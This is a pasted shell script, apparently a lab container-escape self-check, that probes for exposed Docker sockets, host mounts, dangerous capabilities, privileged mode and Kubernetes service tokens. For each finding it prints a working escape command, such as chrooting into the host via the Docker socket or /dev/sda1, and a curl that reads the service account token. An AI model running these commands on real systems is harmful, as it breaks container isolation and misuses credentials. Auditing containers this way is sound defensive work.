orenma

Untitled

Aug 14th, 2025
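  # Container hardening self-check, meant to be run inside a lab container.
  # Every check below only reads local state (paths, mounts, capabilities) and
  # prints findings; nothing it reports is executed.
  #
  # NOTE(review): this spot used to run `apk add jq`, but nothing in the script
  # calls jq. The install was dropped so the check needs no network access and
  # does not modify the container it is auditing. capsh (used by
  # check_cap_sys_admin) is not installed here and must already be present.
  echo "==== Container Escape Safety Check (Lab Only) ===="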
  3.  
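  #######################################
  # Report a detected escape path together with the lab-only command text
  # supplied by the caller. The command is only displayed, never run.
  # Arguments: $1 - short reason for the finding
  #            $2 - command text to display
  # Outputs:   a blank line, the reason line, a label line and the command
  #            indented by four spaces, all on stdout
  #######################################
  suggest_exploit() {
    local reason=$1
    local command=$2

    # printf with %s prints both arguments literally; `echo -e` would expand
    # backslash sequences (\n, \t, \c ...) that happen to occur inside them and
    # silently alter the text shown to the operator.
    printf '\n[⚠️  Escape Path Detected: %s]\n' "$reason"
    printf '%s\n' "[💡 Suggested Command for Lab Use Only]"
    printf '    %s\n' "$command"
  }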
  12.  
  #######################################
  # Report whether a filesystem path exists.
  # Arguments: $1 - path to probe
  #            $2 - explanation printed when the path is present
  # Outputs:   one status line on stdout
  # Returns:   0 when the path exists, 1 otherwise
  #######################################
  check_path() {
    local target=$1 why=$2

    # "Safe" in the message below refers to this single path being absent,
    # nothing more.
    if [ ! -e "$target" ]; then
      echo "[+] Not found: $target - Safe"
      return 1
    fi

    echo "[!] Found: $target - $why"
    return 0
  }
  24.  
  #######################################
  # Report whether the Docker daemon socket is reachable from this container.
  # Outputs: a progress line, then either a finding (via suggest_exploit) or
  #          a "not found" line on stdout
  # Hardening: a container that can talk to the daemon socket can ask it to
  # start other containers, so the socket should not be bind-mounted into
  # workloads that do not strictly need it.
  #######################################
  check_docker_socket() {
    local sock=/var/run/docker.sock

    echo "[*] Checking Docker socket..."

    # -S is true only for an existing socket file.
    if [ ! -S "$sock" ]; then
      echo "[+] Docker socket not found - Safe"
      return
    fi

    echo "[!] Docker socket is mounted inside the container"
    suggest_exploit "Docker socket exposure" \
      "docker -H unix:///var/run/docker.sock run -v /:/mnt --rm -it alpine chroot /mnt sh"
  }
  35.  
  #######################################
  # Report whether /proc/1/root is present, using check_path for the probe.
  # Outputs: check_path's status line, plus a finding when the path exists
  #######################################
  check_host_proc_access() {
    # NOTE(review): /proc/1/root is normally present whenever /proc is mounted
    # and refers to the root of PID 1 as seen from this PID namespace. A hit
    # here presumably needs confirming that PID 1 is really a host process
    # (PID namespace shared with the host) before it is treated as a finding.
    check_path "/proc/1/root" "Can allow access to host filesystem if not namespaced" || return 0

    suggest_exploit "/proc/1/root exposed" \
      "chroot /proc/1/root /bin/sh"
  }
  42.  
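  #######################################
  # Report whether capsh lists CAP_SYS_ADMIN or CAP_SYS_PTRACE for this
  # process.
  # Outputs: a progress line, then a finding, a "not found" line, or a
  #          "result unknown" line when capsh is unavailable
  # Hardening: both capabilities are worth dropping from workloads that do
  # not need them.
  #######################################
  check_cap_sys_admin() {
    echo "[*] Checking capabilities..."

    # Without capsh the pipeline below yields no match, which would otherwise
    # be reported as "Safe". Report the result as unknown instead of giving
    # false assurance.
    if ! command -v capsh >/dev/null 2>&1; then
      echo "[?] capsh not found - capability check skipped (result unknown)"
      return 0
    fi

    # The match is against the whole `capsh --print` output, so a capability
    # named on any of its lines counts as a hit.
    if capsh --print | grep -qE "cap_sys_admin|cap_sys_ptrace"; then
      echo "[!] Container has SYS_ADMIN or PTRACE - Dangerous capabilities available"
      suggest_exploit "SYS_ADMIN + mounted host path" \
        "mount -t proc proc /host/proc && chroot /host sh"
    else
      echo "[+] SYS_ADMIN and PTRACE not found - Safe"
    fi
  }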
  53.  
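  #######################################
  # Report whether this process's effective capability mask looks like that
  # of a privileged container.
  # Outputs: a progress line, then a finding or a "not privileged" line
  # Hardening: avoid running workloads privileged; grant individual
  # capabilities only where required.
  #######################################
  check_privileged_mode() {
    echo "[*] Checking for privileged mode..."

    # /proc/self/status prints the mask as "CapEff:<TAB><hex digits>", so a
    # pattern with a literal space after the colon never matches and the check
    # always reported "not privileged". Match the field name, any whitespace,
    # and a mask whose low 32 bits are all set (heuristic: "likely" only).
    if grep -qE '^CapEff:[[:space:]]+[0-9a-fA-F]*ffffffff$' /proc/self/status; then
      echo "[!] Container likely running in privileged mode"
      suggest_exploit "Privileged container" \
        "mkdir /tmp/host; mount /dev/sda1 /tmp/host && chroot /tmp/host"
    else
      echo "[+] Container is not in full privileged mode"
    fi
  }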
  64.  
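  #######################################
  # Report whether something is mounted at /host or beneath it.
  # Outputs: a finding (via suggest_exploit) or a "no mount" line on stdout
  # Hardening: host paths bind-mounted into a container should be as narrow
  # as possible and read-only where the workload allows it.
  #######################################
  check_host_mount() {
    # Match the mount-point field of `mount` output ("<src> on <dir> type ...")
    # rather than any '/host' substring. The bare substring also matches
    # /etc/hosts and /etc/hostname, which container runtimes commonly
    # bind-mount, so the check fired on ordinary containers.
    if mount | grep -qE ' on /host(/[^ ]*)? type '; then
      echo "[!] Host filesystem appears mounted under /host"
      suggest_exploit "Host mount detected" \
        "chroot /host /bin/bash"
    else
      echo "[+] No mount found at or under /host"
    fi
  }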
  72.  
  #######################################
  # Report whether a Kubernetes service account token file is present at the
  # standard in-pod location.
  # Outputs: a finding (via suggest_exploit) or a "no token" line on stdout
  # Hardening: pods that never call the API server can set
  # automountServiceAccountToken: false, and the service account's RBAC
  # permissions should be kept minimal.
  #######################################
  check_k8s_token() {
    local token_file=/var/run/secrets/kubernetes.io/serviceaccount/token

    if [ ! -f "$token_file" ]; then
      echo "[+] No K8s service account token found"
      return
    fi

    echo "[!] Kubernetes service token found"
    # The command text is only displayed; \$(...) keeps the token from being
    # read while this string is built.
    suggest_exploit "K8s API abuse via service token" \
      "curl -s --header \"Authorization: Bearer \$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)\" https://kubernetes.default"
  }
  82.  
  # Run every check in a fixed order and print a closing banner. Each check
  # reports its own result; their exit statuses are not inspected here.
  echo ""
  check_path "/dev/mem" "Can lead to host memory read/write if privileged"

  for check in \
    check_host_proc_access \
    check_host_mount \
    check_cap_sys_admin \
    check_privileged_mode \
    check_docker_socket \
    check_k8s_token; do
    "$check"
  done

  echo ""
  echo "==== Check Complete. Use responsibly in lab environments only. ===="